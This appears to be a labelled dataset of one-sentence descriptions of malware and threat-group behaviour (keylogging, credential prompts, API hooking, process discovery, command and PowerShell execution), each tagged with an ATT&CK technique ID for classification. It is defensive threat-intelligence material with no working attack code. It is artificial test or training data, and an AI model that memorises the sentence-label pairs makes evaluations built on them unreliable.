{"text1":"Matryoshka is capable of keylogging.","labels":"['T1056.001']"}
{"text1":"Metamorfo has a command to launch a keylogger and capture keystrokes on the victim\u2019s machine.","labels":"['T1056.001']"}
{"text1":"Micropsia has keylogging capabilities.","labels":"['T1056.001']"}
{"text1":"MoonWind has a keylogger.","labels":"['T1056.001']"}
{"text1":"NanoCore can perform keylogging on the victim\u2019s machine.","labels":"['T1056.001']"}
{"text1":"NavRAT logs the keystrokes on the targeted system.","labels":"['T1056.001']"}
{"text1":"OilRig has used keylogging tools called KEYPUNCH and LONGWATCH.","labels":"['T1056.001']"}
{"text1":"Okrum was seen using a keylogger tool to capture keystrokes.","labels":"['T1056.001']"}
{"text1":"One of Attor's plugins can collect user credentials via capturing keystrokes and can capture keystrokes pressed within the window of the injected process.","labels":"['T1056.001']"}
{"text1":"Operation Wocao has obtained the password for the victim's password manager via a custom keylogger.","labels":"['T1056.001']"}
{"text1":"OwaAuth captures and DES-encrypts credentials before writing the username and password to a log file, \"C:\\log.txt\".","labels":"['T1056.001']"}
{"text1":"PLATINUM has used several different keyloggers.","labels":"['T1056.001']"}
{"text1":"Peppy can log keystrokes on compromised hosts.","labels":"['T1056.001']"}
{"text1":"PlugX has a module for capturing keystrokes per process including window titles.","labels":"['T1056.001']"}
{"text1":"PoisonIvy contains a keylogger.","labels":"['T1056.001']"}
{"text1":"PoshC2 has modules for keystroke logging and capturing credentials from spoofed Outlook authentication messages.","labels":"['T1056.001']"}
{"text1":"PowerSploit's \"Get-Keystrokes\" Exfiltration module can log keystrokes.","labels":"['T1056.001']"}
{"text1":"Prikormka contains a keylogger module that collects keystrokes and the titles of foreground windows.","labels":"['T1056.001']"}
{"text1":"Pupy uses a keylogger to capture keystrokes it then sends back to the server after it is stopped.","labels":"['T1056.001']"}
{"text1":"QakBot can capture keystrokes on a compromised host.","labels":"['T1056.001']"}
{"text1":"QuasarRAT has a built-in keylogger.","labels":"['T1056.001']"}
{"text1":"ROKRAT can use `SetWindowsHookEx` and `GetKeyNameText` to capture keystrokes.","labels":"['T1056.001']"}
{"text1":"RTM can record keystrokes from both the keyboard and virtual keyboard.","labels":"['T1056.001']"}
{"text1":"Regin contains a keylogger.","labels":"['T1056.001']"}
{"text1":"Remcos has a command for keylogging.","labels":"['T1056.001']"}
{"text1":"Remexi gathers and exfiltrates keystrokes from the machine.","labels":"['T1056.001']"}
{"text1":"Remsec contains a keylogger component.","labels":"['T1056.001']"}
{"text1":"Rover has keylogging functionality.","labels":"['T1056.001']"}
{"text1":"RunningRAT captures keystrokes and sends them back to the C2 server.","labels":"['T1056.001']"}
{"text1":"SLOTHFULMEDIA has a keylogging capability.","labels":"['T1056.001']"}
{"text1":"SMOKEDHAM can continuously capture keystrokes.","labels":"['T1056.001']"}
{"text1":"Sandworm Team has used a keylogger to capture keystrokes by using the SetWindowsHookEx function.","labels":"['T1056.001']"}
{"text1":"Sowbug has used keylogging tools.","labels":"['T1056.001']"}
{"text1":"SslMM creates a new thread implementing a keylogging facility using Windows Keyboard Accelerators.","labels":"['T1056.001']"}
{"text1":"Sykipot contains keylogging functionality to steal passwords.","labels":"['T1056.001']"}
{"text1":"TajMahal has the ability to capture keystrokes on an infected host.","labels":"['T1056.001']"}
{"text1":"The FunnyDream Keyrecord component can capture keystrokes.","labels":"['T1056.001']"}
{"text1":"The executable version of Helminth has a module to log keystrokes.","labels":"['T1056.001']"}
{"text1":"ThiefQuest uses the \"CGEventTap\" functions to perform keylogging.","labels":"['T1056.001']"}
{"text1":"Threat Group-3390 actors installed a credential logger on Microsoft Exchange servers. Threat Group-3390 also leveraged the reconnaissance framework, ScanBox, to capture keystrokes.","labels":"['T1056.001']"}
{"text1":"TinyZBot contains keylogger functionality.","labels":"['T1056.001']"}
{"text1":"Tonto Team has used keylogging tools in their operations.","labels":"['T1056.001']"}
{"text1":"Trojan.Karagany can capture keystrokes on a compromised host.","labels":"['T1056.001']"}
{"text1":"Unknown Logger is capable of recording keystrokes.","labels":"['T1056.001']"}
{"text1":"VERMIN collects keystrokes from the victim machine.","labels":"['T1056.001']"}
{"text1":"XAgentOSX contains keylogging functionality that monitors for active application windows and writes them to the log; it can handle special characters, and by default it buffers 50 characters before sending them out over the C2 infrastructure.","labels":"['T1056.001']"}
{"text1":"Zeus Panda can perform keylogging on the victim\u2019s machine by hooking the functions TranslateMessage and WM_KEYDOWN.","labels":"['T1056.001']"}
{"text1":"ZxShell has a feature to capture a remote computer's keystrokes using a keylogger.","labels":"['T1056.001']"}
{"text1":"jRAT has the capability to log keystrokes from the victim\u2019s machine, both offline and online.","labels":"['T1056.001']"}
{"text1":"menuPass has used key loggers to steal usernames and passwords.","labels":"['T1056.001']"}
{"text1":"yty uses a keylogger plugin to gather keystrokes.","labels":"['T1056.001']"}
{"text1":"Calisto presents an input prompt asking for the user's login and password.","labels":"['T1056.002']"}
{"text1":"Dok prompts the user for credentials.","labels":"['T1056.002']"}
{"text1":"FIN4 has presented victims with spoofed Windows Authentication prompts to collect their credentials.","labels":"['T1056.002']"}
{"text1":"Keydnap prompts the users for credentials.","labels":"['T1056.002']"}
{"text1":"Metamorfo has displayed fake forms on top of banking sites to intercept credentials from victims.","labels":"['T1056.002']"}
{"text1":"XCSSET prompts the user to input credentials using a native macOS dialog box leveraging the system process \"\/Applications\/Safari.app\/Contents\/MacOS\/SafariForWebKitDevelopment\".","labels":"['T1056.002']"}
{"text1":"iKitten prompts the user for their credentials.","labels":"['T1056.002']"}
{"text1":"Empire contains some modules that leverage API hooking to carry out tasks, such as netripper.","labels":"['T1056.004']"}
{"text1":"NOKKI uses the Windows call SetWindowsHookEx and begins injecting it into every GUI process running on the victim's machine.","labels":"['T1056.004']"}
{"text1":"PLATINUM is capable of using Windows hook interfaces for information gathering such as credential access.","labels":"['T1056.004']"}
{"text1":"RDFSNIFFER hooks several Win32 API functions to hijack elements of the remote system management user-interface.","labels":"['T1056.004']"}
{"text1":"TrickBot has the ability to capture RDP credentials by capturing the \"CredEnumerateA\" API.","labels":"['T1056.004']"}
{"text1":"Ursnif has hooked APIs to perform a wide variety of information theft, such as monitoring traffic from browsers.","labels":"['T1056.004']"}
{"text1":"Zebrocy installs an application-defined Windows hook to get notified when a network drive has been attached, so it can then use the hook to call its RecordToFile file stealing method.","labels":"['T1056.004']"}
{"text1":"ZxShell hooks several API functions to spawn system threads.","labels":"['T1056.004']"}
{"text1":"4H RAT has the capability to obtain a listing of running processes (including loaded modules).","labels":"['T1057']"}
{"text1":"APT1 gathered a list of running processes on the system using \"tasklist \/v\".","labels":"['T1057']"}
{"text1":"APT29 has used multiple command-line utilities to enumerate running processes.","labels":"['T1057']"}
{"text1":"APT37's Freenki malware lists running processes using the Microsoft Windows API.","labels":"['T1057']"}
{"text1":"APT38 leveraged Sysmon to understand the processes and services in the organization.","labels":"['T1057']"}
{"text1":"After compromising a victim, Poseidon Group lists all running processes.","labels":"['T1057']"}
{"text1":"An APT28 loader Trojan will enumerate the victim's processes searching for explorer.exe if its current process does not have necessary permissions.","labels":"['T1057']"}
{"text1":"Andariel has used \"tasklist\" to enumerate processes and find a specific string.","labels":"['T1057']"}
{"text1":"Aria-body has the ability to enumerate loaded modules for a process.","labels":"['T1057']"}
{"text1":"Astaroth searches for different processes on the system.","labels":"['T1057']"}
{"text1":"Avaddon has collected information about running processes.","labels":"['T1057']"}
{"text1":"Avenger has the ability to use Tasklist to identify running processes.","labels":"['T1057']"}
{"text1":"Azorult can collect a list of running processes by calling CreateToolhelp32Snapshot.","labels":"['T1057']"}
{"text1":"BACKSPACE may collect information about running processes.","labels":"['T1057']"}
{"text1":"BBSRAT can list running processes.","labels":"['T1057']"}
{"text1":"BISCUIT has a command to enumerate running processes and identify their owners.","labels":"['T1057']"}
{"text1":"BLACKCOFFEE has the capability to discover processes.","labels":"['T1057']"}
{"text1":"BLUELIGHT can collect process filenames and SID authority level.","labels":"['T1057']"}
{"text1":"Babuk has the ability to check running processes on a targeted system.","labels":"['T1057']"}
{"text1":"BabyShark has executed the \"tasklist\" command.","labels":"['T1057']"}
{"text1":"Backdoor.Oldrea collects information about running processes.","labels":"['T1057']"}
{"text1":"Bad Rabbit can enumerate all running processes to compare hashes.","labels":"['T1057']"}
{"text1":"Bankshot identifies processes and collects the process ids.","labels":"['T1057']"}
{"text1":"Bazar can identify the current process on a compromised host.","labels":"['T1057']"}
{"text1":"Bisonal can obtain a list of running processes on the victim\u2019s machine.","labels":"['T1057']"}
{"text1":"BlackEnergy has gathered a process list by using Tasklist.exe.","labels":"['T1057']"}
{"text1":"Brave Prince lists the running processes.","labels":"['T1057']"}
{"text1":"Bundlore has used the \"ps\" command to list processes.","labels":"['T1057']"}
{"text1":"Cannon can obtain a list of processes running on the system.","labels":"['T1057']"}
{"text1":"Carbanak lists running processes.","labels":"['T1057']"}
{"text1":"Carberp has collected a list of running processes.","labels":"['T1057']"}
{"text1":"Cardinal RAT contains watchdog functionality that ensures its process is always running, else spawns a new instance.","labels":"['T1057']"}
{"text1":"Caterpillar WebShell can gather a list of processes running on the machine.","labels":"['T1057']"}
{"text1":"ChChes collects its process identifier (PID) on the victim.","labels":"['T1057']"}
{"text1":"Chimera has used \"tasklist\" to enumerate processes.","labels":"['T1057']"}
{"text1":"Clambling can enumerate processes on a targeted system.","labels":"['T1057']"}
{"text1":"Clop can enumerate all processes on the victim's machine.","labels":"['T1057']"}
{"text1":"Cobalt Strike's \"beacon\" payload can collect information on process details.","labels":"['T1057']"}
{"text1":"Conti can enumerate through all open processes to search for any that have the string \u201csql\u201d in their process name.","labels":"['T1057']"}
{"text1":"Crimson contains a command to list processes.","labels":"['T1057']"}
{"text1":"Cuba can enumerate processes running on a victim's machine.","labels":"['T1057']"}
{"text1":"DRATzarus can enumerate and examine running processes to determine if a debugger is present.","labels":"['T1057']"}
{"text1":"Dacls can collect data on running and parent processes.","labels":"['T1057']"}
{"text1":"Darkhotel malware can collect a list of running processes on a system.","labels":"['T1057']"}
{"text1":"Derusbi collects current and parent process IDs.","labels":"['T1057']"}
{"text1":"Doki has searched for the current process\u2019s PID.","labels":"['T1057']"}
{"text1":"Donut includes subprojects that enumerate and identify information about Process Injection candidates.","labels":"['T1057']"}
{"text1":"Dtrack\u2019s dropper can list all running processes.","labels":"['T1057']"}
{"text1":"During C0015, the threat actors used the `tasklist \/s` command as well as `taskmanager` to obtain a list of running processes.","labels":"['T1057']"}
{"text1":"During Operation Honeybee, the threat actors obtained a list of running processes on a victim machine using `cmd \/c tasklist > %temp%\\temp.ini`.","labels":"['T1057']"}
{"text1":"During Operation Wocao, the threat actors used `tasklist` to collect a list of running processes on an infected system.","labels":"['T1057']"}
{"text1":"DustySky collects information about running processes from victims.","labels":"['T1057']"}
{"text1":"Elise enumerates processes via the \"tasklist\" command.","labels":"['T1057']"}
{"text1":"Epic uses the \"tasklist \/v\" command to obtain a list of processes.","labels":"['T1057']"}
{"text1":"EvilBunny has used EnumProcesses() to identify how many processes are running in the environment.","labels":"['T1057']"}
{"text1":"FELIXROOT collects a list of running processes.","labels":"['T1057']"}
{"text1":"Flagpro has been used to run the \"tasklist\" command on a compromised system.","labels":"['T1057']"}
{"text1":"FrameworkPOS can enumerate and exclude selected processes on a compromised host to speed execution of memory scraping.","labels":"['T1057']"}
{"text1":"Frankenstein has enumerated hosts, looking to obtain a list of all currently running processes.","labels":"['T1057']"}
{"text1":"FruitFly has the ability to list processes on the system.","labels":"['T1057']"}
{"text1":"FunnyDream has the ability to discover processes, including `Bka.exe` and `BkavUtil.exe`.","labels":"['T1057']"}
{"text1":"Fysbis can collect information about running processes.","labels":"['T1057']"}
{"text1":"Gamaredon Group has used tools to enumerate processes on target hosts including Process Explorer.","labels":"['T1057']"}
{"text1":"Gelsemium can enumerate running processes.","labels":"['T1057']"}
{"text1":"GeminiDuke collects information on running processes and environment variables from the victim.","labels":"['T1057']"}
{"text1":"Gold Dragon checks the running processes on the victim\u2019s machine.","labels":"['T1057']"}
{"text1":"Goopy has checked for the Google Updater process to ensure Goopy was loaded properly.","labels":"['T1057']"}
{"text1":"Grandoreiro can identify installed security tools based on process names.","labels":"['T1057']"}
{"text1":"HALFBAKED can obtain information about running processes on the victim.","labels":"['T1057']"}
{"text1":"HELLOKITTY can search for specific processes to terminate.","labels":"['T1057']"}
{"text1":"HEXANE has enumerated processes on targeted systems.","labels":"['T1057']"}
{"text1":"Helminth has used Tasklist to get information on processes.","labels":"['T1057']"}
{"text1":"Heyoka Backdoor can gather process information.","labels":"['T1057']"}
{"text1":"Higaisa\u2019s shellcode attempted to find the process ID of the current process.","labels":"['T1057']"}
{"text1":"Honeybee gathers a list of processes using the \"tasklist\" command, which is then sent back to the control server.","labels":"['T1057']"}
{"text1":"Hydraq creates a backdoor through which remote attackers can monitor processes.","labels":"['T1057']"}
{"text1":"Inception has used a reconnaissance module to identify active processes and other associated loaded modules.","labels":"['T1057']"}
{"text1":"InvisiMole can obtain a list of running processes.","labels":"['T1057']"}
{"text1":"IronNetInjector can identify processes via C# methods such as \"GetProcessesByName\" and running Tasklist with the Python \"os.popen\" function.","labels":"['T1057']"}
{"text1":"Ixeshe can list running processes.","labels":"['T1057']"}
{"text1":"JHUHUGIT obtains a list of running processes on the victim.","labels":"['T1057']"}
{"text1":"Javali can monitor processes for open browsers and custom banking applications.","labels":"['T1057']"}
{"text1":"KEYMARBLE can obtain a list of running processes on the system.","labels":"['T1057']"}
{"text1":"KONNI has used the command \"cmd \/c tasklist\" to get a snapshot of the current processes on the target machine.","labels":"['T1057']"}
{"text1":"Kasidet has the ability to search for a given process name in processes currently running in the system.","labels":"['T1057']"}
{"text1":"Ke3chang performs process discovery using \"tasklist\" commands.","labels":"['T1057']"}
{"text1":"Kimsuky can gather a list of all processes running on a victim's machine.","labels":"['T1057']"}
{"text1":"Kinsing has used ps to list processes.","labels":"['T1057']"}
{"text1":"Kwampirs collects a list of running services with the command \"tasklist \/v\".","labels":"['T1057']"}
{"text1":"LookBack can list running processes.","labels":"['T1057']"}
{"text1":"LoudMiner used the \"ps\" command to monitor the running processes on the system.","labels":"['T1057']"}
{"text1":"Lucifer can identify the process that owns remote connections.","labels":"['T1057']"}
{"text1":"MacMa can enumerate running processes.","labels":"['T1057']"}
{"text1":"Machete has a component to check for running processes to look for web browsers.","labels":"['T1057']"}
{"text1":"Magic Hound malware can list running processes.","labels":"['T1057']"}
{"text1":"MarkiRAT can search for different processes on a system.","labels":"['T1057']"}
{"text1":"Maze has gathered all of the running system processes.","labels":"['T1057']"}
{"text1":"Meteor can check if a specific process is running, such as Kaspersky's `avp.exe`.","labels":"['T1057']"}
{"text1":"MobileOrder has a command to upload information about all running processes to its C2 server.","labels":"['T1057']"}
{"text1":"Mosquito runs \"tasklist\" to obtain running processes.","labels":"['T1057']"}
{"text1":"MuddyWater has used malware to obtain a list of running processes on the system.","labels":"['T1057']"}
{"text1":"NavRAT uses \"tasklist \/v\" to check running processes.","labels":"['T1057']"}
{"text1":"Nebulae can enumerate processes on a target system.","labels":"['T1057']"}
{"text1":"ObliqueRAT can check for blocklisted process names on a compromised host.","labels":"['T1057']"}
{"text1":"OceanSalt can collect the name and ID for every process running on the system.","labels":"['T1057']"}
{"text1":"OilRig has run \"tasklist\" on a victim's machine.","labels":"['T1057']"}
{"text1":"Orz can gather a process list from the victim.","labels":"['T1057']"}
{"text1":"OutSteel can identify running processes on a compromised host.","labels":"['T1057']"}
{"text1":"P8RAT can check for specific processes associated with virtual environments.","labels":"['T1057']"}
{"text1":"PLAINTEE performs the \"tasklist\" command to list running processes.","labels":"['T1057']"}
{"text1":"PLEAD has the ability to list processes on the compromised host.","labels":"['T1057']"}
{"text1":"POORAIM can enumerate processes.","labels":"['T1057']"}
{"text1":"POWERSTATS has used \"get_tasklist\" to discover processes on the compromised host.","labels":"['T1057']"}
{"text1":"POWRUNER may collect process information by running \"tasklist\" on a victim.","labels":"['T1057']"}
{"text1":"Pandora can monitor processes on a compromised host.","labels":"['T1057']"}
{"text1":"Pasam creates a backdoor through which remote attackers can retrieve lists of running processes.","labels":"['T1057']"}
{"text1":"PcShare can obtain a list of running processes on a compromised host.","labels":"['T1057']"}
{"text1":"Pillowmint can iterate through running processes every six seconds collecting a list of processes to capture from later.","labels":"['T1057']"}
{"text1":"PipeMon can iterate over the running processes to find a suitable injection target.","labels":"['T1057']"}
{"text1":"PlugX has a module to list the processes running on a machine.","labels":"['T1057']"}
{"text1":"PoetRAT has the ability to list all running processes.","labels":"['T1057']"}
{"text1":"PowerDuke has a command to list the victim's processes.","labels":"['T1057']"}
{"text1":"PowerSploit's \"Get-ProcessTokenPrivilege\" Privesc-PowerUp module can enumerate privileges for a given process.","labels":"['T1057']"}
{"text1":"Proxysvc lists processes running on the system.","labels":"['T1057']"}
{"text1":"Pupy can list the running processes and get the process ID and parent process\u2019s ID.","labels":"['T1057']"}
{"text1":"QakBot has the ability to check running processes.","labels":"['T1057']"}
{"text1":"RATANKBA lists the system\u2019s processes.","labels":"['T1057']"}
{"text1":"ROKRAT can list the current running processes on the system.","labels":"['T1057']"}
{"text1":"RTM can obtain information about process integrity levels.","labels":"['T1057']"}
{"text1":"RainyDay can enumerate processes on a target system.","labels":"['T1057']"}
{"text1":"Ramsay can gather a list of running processes by using Tasklist.","labels":"['T1057']"}
{"text1":"Rising Sun can enumerate all running processes and process information on an infected machine.","labels":"['T1057']"}
{"text1":"Rocke can detect a running process's PID on the infected machine.","labels":"['T1057']"}
{"text1":"RogueRobin checks the running processes for evidence it may be running in a sandbox environment. It specifically enumerates processes for Wireshark and Sysinternals.","labels":"['T1057']"}
{"text1":"Ryuk has called \"CreateToolhelp32Snapshot\" to enumerate all running processes.","labels":"['T1057']"}
|
|
{"text1":"SDBbot can enumerate a list of running processes on a compromised machine.","labels":"['T1057']"}
|
|
{"text1":"SHOTPUT has a command to obtain a process listing.","labels":"['T1057']"}
|
|
{"text1":"SILENTTRINITY can enumerate processes, including properties to determine if they have the Common Language Runtime (CLR) loaded.","labels":"['T1057']"}
|
|
{"text1":"SLOTHFULMEDIA has enumerated processes by ID, name, or privileges.","labels":"['T1057']"}
|
|
{"text1":"SUNBURST collected a list of process names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists.","labels":"['T1057']"}
|
|
{"text1":"SUNSPOT monitored running processes for instances of \"MsBuild.exe\" by hashing the name of each running process and comparing it to the corresponding value \"0x53D525\". It also extracted command-line arguments and individual arguments from the running \"MsBuild.exe\" process to identify the directory path of the Orion software Visual Studio solution.","labels":"['T1057']"}
|
|
{"text1":"SYSCON has the ability to use Tasklist to list running processes.","labels":"['T1057']"}
|
|
{"text1":"Saint Bot has enumerated running processes on a compromised host to determine if it is running under the process name `dfrgui.exe`.","labels":"['T1057']"}
|
|
{"text1":"Seasalt has a command to perform a process listing.","labels":"['T1057']"}
|
|
{"text1":"ShadowPad has collected the PID of a malicious process.","labels":"['T1057']"}
|
|
{"text1":"ShimRatReporter listed all running processes on the machine.","labels":"['T1057']"}
|
|
{"text1":"Sidewinder has used tools to identify running processes on the victim's machine.","labels":"['T1057']"}
|
|
{"text1":"Skidmap has monitored critical processes to ensure resiliency.","labels":"['T1057']"}
|
|
{"text1":"Socksbot can list all running processes.","labels":"['T1057']"}
|
|
{"text1":"SodaMaster can search a list of running processes.","labels":"['T1057']"}
|
|
{"text1":"SoreFang can enumerate processes on a victim machine through use of Tasklist.","labels":"['T1057']"}
|
|
{"text1":"StrongPity can determine if a user is logged in by checking to see if explorer.exe is running.","labels":"['T1057']"}
|
|
{"text1":"Sykipot may gather a list of running processes by running \"tasklist \/v\".","labels":"['T1057']"}
|
|
{"text1":"TAINTEDSCRIBE can execute \"ProcessList\" for process discovery.","labels":"['T1057']"}
|
|
{"text1":"TSCookie has the ability to list processes on the infected host.","labels":"['T1057']"}
|
|
{"text1":"TajMahal has the ability to identify running processes and associated plugins on an infected host.","labels":"['T1057']"}
|
|
{"text1":"Tasklist can be used to discover processes running on a system.","labels":"['T1057']"}
|
|
{"text1":"TeamTNT has searched for rival malware and removes it if found. TeamTNT has also searched for running processes containing the strings aliyun or liyun to identify machines running Alibaba Cloud Security tools.","labels":"['T1057']"}
|
|
{"text1":"The OsInfo function in Komplex collects a running process list.","labels":"['T1057']"}
|
|
{"text1":"The discovery modules used with Duqu can collect information on process details.","labels":"['T1057']"}
|
|
{"text1":"ThiefQuest obtains a list of running processes using the function \"kill_unwanted\".","labels":"['T1057']"}
|
|
{"text1":"TrickBot uses module networkDll for process list discovery.","labels":"['T1057']"}
|
|
{"text1":"Trojan.Karagany can use Tasklist to collect a list of running tasks.","labels":"['T1057']"}
|
|
{"text1":"Tropic Trooper is capable of enumerating the running processes on the system using \"pslist\".","labels":"['T1057']"}
|
|
{"text1":"UBoatRAT can list running processes on the system.","labels":"['T1057']"}
|
|
{"text1":"UNC2452 used multiple command-line utilities to enumerate running processes.","labels":"['T1057']"}
|
|
{"text1":"USBferry can use \"tasklist\" to gather information about the process running on the infected system.","labels":"['T1057']"}
|
|
{"text1":"Ursnif has gathered information about running processes.","labels":"['T1057']"}
|
|
{"text1":"VERMIN can get a list of the processes and running tasks on the system.","labels":"['T1057']"}
|
|
{"text1":"WINERACK can enumerate processes.","labels":"['T1057']"}
|
|
{"text1":"WarzoneRAT can obtain a list of processes on a compromised host.","labels":"['T1057']"}
|
|
{"text1":"Windshift has used malware to enumerate active processes.","labels":"['T1057']"}
|
|
{"text1":"Winnti Group looked for a specific process running on infected servers.","labels":"['T1057']"}
|
|
{"text1":"Winnti for Windows can check if the explorer.exe process is responsible for calling its install function.","labels":"['T1057']"}
|
|
{"text1":"Zebrocy uses the \"tasklist\" and \"wmic process get Capture, ExecutablePath\" commands to gather the processes running on the system.","labels":"['T1057']"}
|
|
{"text1":"Zeus Panda checks for running processes on the victim\u2019s machine.","labels":"['T1057']"}
|
|
{"text1":"Zox has the ability to list processes.","labels":"['T1057']"}
|
|
{"text1":"ZxShell has a command, ps, to obtain a listing of processes on the system.","labels":"['T1057']"}
|
|
{"text1":"ZxxZ has created a snapshot of running processes using `CreateToolhelp32Snapshot`.","labels":"['T1057']"}
|
|
{"text1":"down_new has the ability to list running processes on a compromised host.","labels":"['T1057']"}
|
|
{"text1":"gh0st RAT has the capability to list processes.","labels":"['T1057']"}
|
|
{"text1":"macOS.OSAMiner has used `ps ax | grep <name> | grep -v grep | ...` and `ps ax | grep -E...` to conduct process discovery.","labels":"['T1057']"}
|
|
{"text1":"njRAT can search a list of running processes for Tr.exe.","labels":"['T1057']"}
|
|
{"text1":"yty gets an output of running processes using the \"tasklist\" command.","labels":"['T1057']"}
|
|
{"text1":"APT19 downloaded and launched code within a SCT file.","labels":"['T1059']"}
|
|
{"text1":"APT28 uses cmd.exe to execute commands and custom backdoors.","labels":"['T1059']"}
|
|
{"text1":"APT32 has used COM scriptlets to download Cobalt Strike beacons.","labels":"['T1059']"}
|
|
{"text1":"APT34 has used the command-line interface for execution.","labels":"['T1059']"}
|
|
{"text1":"APT37 has used Ruby scripts to execute payloads.","labels":"['T1059']"}
|
|
{"text1":"APT39 has utilized AutoIt and custom scripts to perform internal reconnaissance.","labels":"['T1059']"}
|
|
{"text1":"Astaroth spawns a CMD process to execute commands.","labels":"['T1059', 'T1059.003']"}
|
|
{"text1":"BRONZE BUTLER uses the command-line interface.","labels":"['T1059']"}
|
|
{"text1":"Bonadan can create bind and reverse shells on the infected system.","labels":"['T1059']"}
|
|
{"text1":"CHOPSTICK is capable of performing remote command execution.","labels":"['T1059']"}
|
|
{"text1":"Cobalt Group has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands.","labels":"['T1059']"}
|
|
{"text1":"Denis can launch a remote shell to execute arbitrary commands on the victim\u2019s machine.","labels":"['T1059', 'T1059.003']"}
|
|
{"text1":"Donut can generate shellcode outputs that execute via Ruby.","labels":"['T1059']"}
|
|
{"text1":"Dragonfly has used the command line for execution.","labels":"['T1059']"}
|
|
{"text1":"Emotet has used cmd.exe to run a PowerShell script.","labels":"['T1059', 'T1059.003']"}
|
|
{"text1":"Empire uses a command-line interface to interact with systems.","labels":"['T1059']"}
|
|
{"text1":"Exaramel for Windows has a command to launch a remote shell and executes commands on the victim\u2019s machine.","labels":"['T1059', 'T1059.003']"}
|
|
{"text1":"FIN6 has used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.","labels":"['T1059']"}
|
|
{"text1":"FIN7 used SQL scripts to help perform tasks on the victim's machine.","labels":"['T1059']"}
|
|
{"text1":"FIVEHANDS can receive a command line argument to limit file encryption to specified directories.","labels":"['T1059']"}
|
|
{"text1":"Fox Kitten has used a Perl reverse shell to communicate with C2.","labels":"['T1059']"}
|
|
{"text1":"Get2 has the ability to run executables with command-line arguments.","labels":"['T1059']"}
|
|
{"text1":"Imminent Monitor has a CommandPromptPacket and ScriptPacket module(s) for creating a remote shell and executing scripts.","labels":"['T1059']"}
|
|
{"text1":"Kessel can create a reverse shell between the infected host and a specified system.","labels":"['T1059']"}
|
|
{"text1":"Lazarus Group malware uses cmd.exe to execute commands on victims.","labels":"['T1059']"}
|
|
{"text1":"Malware used by Ke3chang can run commands on the command-line interface.","labels":"['T1059']"}
|
|
{"text1":"Matryoshka is capable of providing Meterpreter shell access.","labels":"['T1059']"}
|
|
{"text1":"Molerats used various implants, including those built on .NET, on target machines.","labels":"['T1059']"}
|
|
{"text1":"MoonWind can execute commands via an interactive command shell.","labels":"['T1059']"}
|
|
{"text1":"OSX_OCEANLOTUS.D can run commands through a terminal on the victim\u2019s machine.","labels":"['T1059']"}
|
|
{"text1":"OilRig has used the command-line interface for execution.","labels":"['T1059']"}
|
|
{"text1":"OilRig has used various types of scripting for execution.","labels":"['T1059']"}
|
|
{"text1":"P.A.S. Webshell has the ability to create reverse shells with Perl scripts.","labels":"['T1059']"}
|
|
{"text1":"PoetRAT has executed a Lua script through a Lua interpreter for Windows.","labels":"['T1059']"}
|
|
{"text1":"Several commands are supported by the Honeybee's implant via the command-line interface and there\u2019s also a utility to execute any custom command on an infected endpoint.","labels":"['T1059']"}
|
|
{"text1":"SpeakUp uses Perl scripts.","labels":"['T1059']"}
|
|
{"text1":"Stealth Falcon malware uses WMI to script data collection and command execution on the victim.","labels":"['T1059']"}
|
|
{"text1":"TYPEFRAME can execute commands using a shell.","labels":"['T1059']"}
|
|
{"text1":"WINERACK can create a reverse shell that utilizes statically-linked Wine cmd.exe code to emulate Windows command prompt commands.","labels":"['T1059']"}
|
|
{"text1":"Whitefly has used a simple remote shell tool that will call back to the C2 server and wait for commands.","labels":"['T1059']"}
|
|
{"text1":"creates a backdoor through which remote attackers can open a command-line interface.","labels":"['T1059', 'T1059']"}
|
|
{"text1":"gh0st RAT is able to open a remote shell to execute commands.","labels":"['T1059']"}
|
|
{"text1":"AADInternals is written and executed via PowerShell.","labels":"['T1059.001']"}
|
|
{"text1":"APT19 used PowerShell commands to execute payloads.","labels":"['T1059.001']"}
|
|
{"text1":"APT28 downloads and executes PowerShell scripts and performs PowerShell commands.","labels":"['T1059.001']"}
|
|
{"text1":"APT29 has used encoded PowerShell scripts uploaded to CozyCar installations to download and install SeaDuke. APT29 also used PowerShell to create new tasks on remote machines, identify configuration settings, evade defenses, exfiltrate data, and to execute other commands.","labels":"['T1059.001']"}
|
|
{"text1":"APT32 has used PowerShell-based tools, PowerShell one-liners, and shellcode loaders for execution.","labels":"['T1059.001']"}
|
|
{"text1":"APT33 has utilized PowerShell to download files from the C2 server and run various scripts.","labels":"['T1059.001']"}
|
|
{"text1":"APT38 has used PowerShell to execute commands and other operational tasks.","labels":"['T1059.001']"}
|
|
{"text1":"AppleSeed has the ability to execute its payload via PowerShell.","labels":"['T1059.001']"}
|
|
{"text1":"Aquatic Panda has downloaded additional scripts and executed Base64 encoded commands in PowerShell.","labels":"['T1059.001']"}
|
|
{"text1":"AutoIt backdoor downloads a PowerShell script that decodes to a typical shellcode loader.","labels":"['T1059.001']"}
|
|
{"text1":"BRONZE BUTLER has used PowerShell for execution.","labels":"['T1059.001']"}
|
|
{"text1":"Bandook has used PowerShell loaders as part of execution.","labels":"['T1059.001']"}
|
|
{"text1":"Bazar can execute a PowerShell script received from C2.","labels":"['T1059.001']"}
|
|
{"text1":"BloodHound can use PowerShell to pull Active Directory information from the target environment.","labels":"['T1059.001']"}
|
|
{"text1":"Blue Mockingbird has used PowerShell reverse TCP shells to issue interactive commands over a network connection.","labels":"['T1059.001']"}
|
|
{"text1":"Bumblebee can use PowerShell for execution.","labels":"['T1059.001']"}
|
|
{"text1":"CharmPower can use PowerShell for payload execution and C2 communication.","labels":"['T1059.001']"}
|
|
{"text1":"Chimera has used PowerShell scripts to execute malicious payloads and the DSInternals PowerShell module to make use of Active Directory features.","labels":"['T1059.001']"}
|
|
{"text1":"Cobalt Group has used powershell.exe to download and execute scripts.","labels":"['T1059.001']"}
|
|
{"text1":"ComRAT has used PowerShell to load itself every time a user logs in to the system. ComRAT can execute PowerShell scripts loaded into memory or from the file system.","labels":"['T1059.001']"}
|
|
{"text1":"ConnectWise can be used to execute PowerShell commands on target machines.","labels":"['T1059.001']"}
|
|
{"text1":"CrackMapExec can execute PowerShell commands via WMI.","labels":"['T1059.001']"}
|
|
{"text1":"CreepySnail can use PowerShell for execution, including the cmdlets `Invoke-WebRequst` and `Invoke-Expression`.","labels":"['T1059.001']"}
|
|
{"text1":"Cuba has been dropped onto systems and used for lateral movement via obfuscated PowerShell scripts.","labels":"['T1059.001']"}
|
|
{"text1":"DarkVishnya used PowerShell to create shellcode loaders.","labels":"['T1059.001']"}
|
|
{"text1":"DarkWatchman can execute PowerShell commands and has used PowerShell to execute a keylogger.","labels":"['T1059.001']"}
|
|
